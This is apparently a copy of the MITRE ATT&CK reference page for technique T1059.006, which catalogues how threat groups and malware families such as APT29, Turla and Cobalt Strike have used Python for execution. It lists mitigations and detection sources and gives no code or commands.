T1059.006 Python
Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe
interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
Item | Value |
---|---|
ID | T1059.006 |
Sub-techniques | T1059.001, T1059.002, T1059.003, T1059.004, T1059.005, T1059.006, T1059.007, T1059.008, T1059.009 |
Tactics | TA0002 |
Platforms | Linux, Windows, macOS |
Permissions required | Administrator, SYSTEM, root |
Version | 1.0 |
Created | 09 March 2020 |
Last Modified | 26 July 2021 |
Procedure Examples
ID | Name | Description |
---|---|---|
G0016 | APT29 | APT29 has developed malware variants written in Python.39 |
G0067 | APT37 | APT37 has used Python scripts to execute payloads.37 |
G0087 | APT39 | APT39 has used a command line utility and a network scanner written in python.3334 |
S0234 | Bandook | Bandook can support commands to execute Python-based payloads.29 |
G0060 | BRONZE BUTLER | BRONZE BUTLER has made use of Python-based remote access tools.42 |
S0482 | Bundlore | Bundlore has used Python scripts to execute payloads.28 |
S0631 | Chaes | Chaes has used Python scripts for execution and the installation of additional files.9 |
S0154 | Cobalt Strike | Cobalt Strike can use Python to perform execution.12141315 |
S0369 | CoinTicker | CoinTicker executes a Python script to download its second stage.18 |
S0492 | CookieMiner | CookieMiner has used python scripts on the user’s system, as well as the Python variant of the Empire agent, EmPyre.21 |
S0695 | Donut | Donut can generate shellcode outputs that execute via Python.4 |
G0035 | Dragonfly | Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.38 |
S0547 | DropBook | DropBook is a Python-based backdoor compiled with PyInstaller.8 |
G1006 | Earth Lusca | Earth Lusca used Python scripts for port scanning or building reverse shells.32 |
S0377 | Ebury | Ebury has used Python to implement its DGA.10 |
S0581 | IronNetInjector | IronNetInjector can use IronPython scripts to load payloads with the help of a .NET injector.2 |
S0387 | KeyBoy | KeyBoy uses Python scripts for installing files and performing execution.17 |
S0276 | Keydnap | Keydnap uses Python for scripting to execute additional commands.16 |
G0094 | Kimsuky | Kimsuky has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.4344 |
S0409 | Machete | Machete is written in Python and is used in conjunction with additional Python scripts.242526 |
G0095 | Machete | Machete used multiple compiled Python scripts on the victim’s system. Machete‘s main backdoor Machete is also written in Python.362426 |
S0459 | MechaFlounder | MechaFlounder uses a python-based payload.22 |
G0069 | MuddyWater | MuddyWater has used developed tools in Python including Out1.45 |
C0014 | Operation Wocao | During Operation Wocao, threat actors’ backdoors were written in Python and compiled with py2exe.46 |
S0428 | PoetRAT | PoetRAT was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.30 |
S0196 | PUNCHBUGGY | PUNCHBUGGY has used python scripts.19 |
S0192 | Pupy | Pupy can use an add on feature when creating payloads that allows you to create custom Python scripts (“scriptlets”) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.1 |
S1032 | PyDCrypt | PyDCrypt, along with its functions, is written in Python.23 |
S0583 | Pysa | Pysa has used Python scripts to deploy ransomware.27 |
S0332 | Remcos | Remcos uses Python scripts.3 |
G0106 | Rocke | Rocke has used Python-based malware to install and spread their coinminer.35 |
S0692 | SILENTTRINITY | SILENTTRINITY is written in Python and can use multiple Python scripts for execution on targeted systems.56 |
S1035 | Small Sieve | Small Sieve can use Python scripts to execute commands.7 |
S0374 | SpeakUp | SpeakUp uses Python scripts.20 |
G0131 | Tonto Team | Tonto Team has used Python-based tools for execution.31 |
S0647 | Turian | Turian has the ability to use Python to spawn a Unix shell.11 |
G0010 | Turla | Turla has used IronPython scripts as part of the IronNetInjector toolchain to drop payloads.2 |
G0128 | ZIRCONIUM | ZIRCONIUM has used Python-based implants to interact with compromised hosts.4041 |
Mitigations
ID | Mitigation | Description |
---|---|---|
M1049 | Antivirus/Antimalware | Anti-virus can be used to automatically quarantine suspicious files. |
M1047 | Audit | Inventory systems for unauthorized Python installations. |
M1038 | Execution Prevention | Denylist Python where not required. |
M1033 | Limit Software Installation | Prevent users from installing Python where not required. |
Detection
ID | Data Source | Data Component |
---|---|---|
DS0017 | Command | Command Execution |
DS0009 | Process | Process Creation |
References
-
Reichel, D. (2021, February 19). IronNetInjector: Turla’s New Malware Loading Tool. Retrieved February 24, 2021. ↩↩
-
Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018. ↩
-
Salvati, M (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022. ↩
-
Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022. ↩
-
NCSC GCHQ. (2022, January 27). Small Sieve Malware Analysis Report. Retrieved August 22, 2022. ↩
-
Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020. ↩
-
Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021. ↩
-
Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021. ↩
-
Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021 ↩
-
Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017. ↩
-
Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021. ↩
-
Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019. ↩
-
Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021. ↩
-
Patrick Wardle. (2017, January 1). Mac Malware of 2016. Retrieved September 21, 2018. ↩
-
Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019. ↩
-
Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019. ↩
-
Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019. ↩
-
Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019. ↩
-
Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020. ↩
-
Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020. ↩
-
Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022. ↩
-
ESET. (2019, July). MACHETE JUST GOT SHARPER Venezuelan government institutions under attack. Retrieved September 13, 2019. ↩↩
-
Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019. ↩
-
kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020. ↩↩
-
CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021. ↩
-
Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020. ↩
-
Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021. ↩
-
Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020. ↩
-
Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021. ↩
-
Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022. ↩
-
Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020. ↩
-
FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. ↩
-
Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019. ↩
-
The Cylance Threat Research Team. (2017, March 22). El Machete’s Malware Attacks Cut Through LATAM. Retrieved September 13, 2019. ↩
-
Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021. ↩
-
US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018. ↩
-
Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015. ↩
-
Huntley, S. (2020, October 16). How We’re Tackling Evolving Online Threats. Retrieved March 24, 2021. ↩
-
Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021. ↩
-
Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020. ↩
-
CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020. ↩
-
KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022. ↩
-
Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. ↩
-
Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. ↩